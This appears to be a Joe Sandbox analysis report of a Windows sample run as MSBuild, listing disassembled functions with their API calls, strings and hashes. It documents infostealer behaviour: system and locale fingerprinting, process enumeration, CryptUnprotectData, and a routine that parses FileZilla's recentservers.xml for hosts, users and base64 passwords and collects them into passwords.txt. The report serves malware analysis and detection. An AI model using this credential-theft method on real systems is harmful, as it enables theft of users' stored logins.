                                                                                        • Opcode ID: 9b9e51895c0420d9448e1988449149efec611e2b48949a7b5df7ff6d24a7b9e6
                                                                                        • Instruction ID: 9bfd207ce50c0c1877f45400523c984a60adf101312f3de179d0de13c9639d5b
                                                                                        • Opcode Fuzzy Hash: 9b9e51895c0420d9448e1988449149efec611e2b48949a7b5df7ff6d24a7b9e6
                                                                                        • Instruction Fuzzy Hash: EB911F72900108A7CB24FB71DC569EE777DAB44744F40863EF902A29D6EF789A0C8695
                                                                                        Function 0040FC30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                        • String ID: /
                                                                                        • API String ID: 507856799-4001269591
                                                                                        • Opcode ID: a6a69e9ec3cf8801765d105cb29036808ee146180d7c1341de0be4b221ecb394
                                                                                        • Instruction ID: 0df51f6c7c38cdc7b73c36f3f29490646fb89a6b7ce8503a4d5a956f8c487b71
                                                                                        • Opcode Fuzzy Hash: a6a69e9ec3cf8801765d105cb29036808ee146180d7c1341de0be4b221ecb394
                                                                                        • Instruction Fuzzy Hash: 13218271500218BBDB20EBA1DC86EEE777DEF88700F40513AFA05661C1DF789949CBA4
                                                                                        Function 0040FBC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
                                                                                        • wsprintfA.USER32 ref: 0040FC12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                        • String ID: wwww
                                                                                        • API String ID: 362916592-671953474
                                                                                        • Opcode ID: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
                                                                                        • Instruction ID: fbce99371d8f23c69195bcece4cb59d5ef7dd42c2aed0f13d542024a30712026
                                                                                        • Opcode Fuzzy Hash: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
                                                                                        • Instruction Fuzzy Hash: 1EF02770B00218ABD71C3B78AC0EE6A3B6EAB81311F041365FF06CA2C0DB704C104AD1
                                                                                        Function 004112F0 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411329
                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00411339
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041134B
                                                                                        • StrCmpCA.SHLWAPI(?,?), ref: 00411360
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00411385
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 420147892-0
                                                                                        • Opcode ID: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
                                                                                        • Instruction ID: 3ee263357de7356a118a80b25b2dae21b26717c0aa6c402fa6d9d07f030b476f
                                                                                        • Opcode Fuzzy Hash: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
                                                                                        • Instruction Fuzzy Hash: 70114C75A01618AFDB10DF98DC45BEEB7BCFB49761F0042AAE919E3680D7345A00CBA5
                                                                                        Function 00411400 Relevance: 7.6, APIs: 5, Instructions: 53processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00411449
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
                                                                                        • StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3243318325-0
                                                                                        • Opcode ID: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
                                                                                        • Instruction ID: f304eba33368e90d87c3244fdfdafea8657fd46212b62d22af59a709f315db57
                                                                                        • Opcode Fuzzy Hash: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
                                                                                        • Instruction Fuzzy Hash: 83110472944218AFC710CF94DC45BEBBBBCFB06B00F00916AFA0593240DB384A04CBE4
                                                                                        Function 00406D50 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
                                                                                        • LocalFree.KERNEL32(?), ref: 00406DAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                        • String ID:
                                                                                        • API String ID: 2068576380-0
                                                                                        • Opcode ID: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
                                                                                        • Instruction ID: 5178535980331d1a95a47210b24ee6b6febbe527be0b83028620034588f0433e
                                                                                        • Opcode Fuzzy Hash: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
                                                                                        • Instruction Fuzzy Hash: FE012C79A00209ABDB10DFA8DC55FAA77B9EFC8700F144559FA05AB380DB75ED00CBA4
                                                                                        Function 0040FAE0 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
                                                                                        • GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 1206570057-0
                                                                                        • Opcode ID: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
                                                                                        • Instruction ID: 78103743301cbd06d6d8d66bd0cdb6708e3bc561754f37119468ce18e8306284
                                                                                        • Opcode Fuzzy Hash: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
                                                                                        • Instruction Fuzzy Hash: 8FD012B1601218BBE7109BD4AC0DFDABBACDB05765F4001A1FA05D2241D5B0594087E5
                                                                                        Function 0040FDA0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2452939696-0
                                                                                        • Opcode ID: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
                                                                                        • Instruction ID: 2d001d16c60f98aa9cd43fb7044d9c99f47e8ba4ce822719c414ae554ccf3ebb
                                                                                        • Opcode Fuzzy Hash: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
                                                                                        • Instruction Fuzzy Hash: 9DD012B590021C97C710EB90FC859A9B77DEB44301F405695EF05A2141E779AA198BE5
                                                                                        Function 0040B9A0 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 335stringmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 584 40b9a0-40ba37 call 40f810 call 410d50 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f850 call 406c20 607 40bdd6-40be03 call 40f890 * 5 584->607 608 40ba3d-40ba4f call 410da0 584->608 608->607 614 40ba55-40bab4 strtok_s call 40f810 * 4 GetProcessHeap HeapAlloc 608->614 630 40bd59-40bdd1 lstrlenA call 40f810 call 401080 call 4142a0 call 40f890 call 40fa00 * 4 call 40f890 * 4 614->630 631 40baba 614->631 630->607 632 40bac0-40bace StrStrA 631->632 634 40bad0-40baf6 lstrlenA call 411200 call 40f8f0 call 40f890 632->634 635 40bafb-40bb09 StrStrA 632->635 634->635 638 40bb0b-40bb37 lstrlenA call 411200 call 40f8f0 call 40f890 635->638 639 40bb3c-40bb4a StrStrA 635->639 638->639 641 40bb77-40bb85 StrStrA 639->641 642 40bb4c-40bb72 lstrlenA call 411200 call 40f8f0 call 40f890 639->642 648 40bb87-40bbcd lstrlenA call 411200 call 40f8f0 call 40f890 call 40fa50 call 406cd0 641->648 649 40bbfd-40bc0f call 40fa50 lstrlenA 641->649 642->641 648->649 692 40bbcf-40bbf8 call 40f8a0 call 40f9a0 call 40f8f0 call 40f890 648->692 667 40bc15-40bc27 call 40fa50 lstrlenA 649->667 668 40bd3d-40bd53 strtok_s 649->668 667->668 677 40bc2d-40bc3f call 40fa50 lstrlenA 667->677 668->630 668->632 677->668 687 40bc45-40bc57 call 40fa50 lstrlenA 677->687 687->668 696 40bc5d-40bd38 lstrcatA * 2 call 40fa50 lstrcatA * 2 call 40fa50 lstrcatA * 3 call 40fa50 lstrcatA * 3 call 40fa50 lstrcatA * 3 call 40f8a0 * 4 687->696 692->649 696->668
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                        • strtok_s.MSVCRT ref: 0040BA5E
                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,004201E9,004201E9,004201E9,004201E9), ref: 0040BAA3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAAA
                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BAC6
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAD1
                                                                                          • Part of subcall function 00411200: malloc.MSVCRT ref: 00411209
                                                                                          • Part of subcall function 00411200: strncpy.MSVCRT ref: 00411219
                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BB01
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB0C
                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BB42
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB4D
                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BB7D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB88
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC06
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC1E
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC36
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC4E
                                                                                        • lstrcatA.KERNEL32(00000000,Soft: FileZilla), ref: 0040BC63
                                                                                        • lstrcatA.KERNEL32(00000000,Host: ), ref: 0040BC6F
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC7F
                                                                                        • lstrcatA.KERNEL32(00000000,00423454), ref: 0040BC8B
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC9B
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCA7
                                                                                        • lstrcatA.KERNEL32(00000000,Login: ), ref: 0040BCB3
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCC3
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCCF
                                                                                        • lstrcatA.KERNEL32(00000000,Password: ), ref: 0040BCDB
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCEB
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCF7
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BD03
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                        • strtok_s.MSVCRT ref: 0040BD47
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD5A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocstrncpy
                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                        • API String ID: 1826205597-935134978
                                                                                        • Opcode ID: 0a0edcdc4cde4ec1ac0265a6167de9880c7b0e3dc5dfc98ac2e77db5e7e6669d
                                                                                        • Instruction ID: 995b618bf102b3cf0671245d97106fbcf4553354a52c55c251f6feeeb9f0d63c
                                                                                        • Opcode Fuzzy Hash: 0a0edcdc4cde4ec1ac0265a6167de9880c7b0e3dc5dfc98ac2e77db5e7e6669d
                                                                                        • Instruction Fuzzy Hash: A4B150729001046ADB14FBA1EC56EEE777CEE50705F54903AF502B24D2EF3C6A0DCAA9
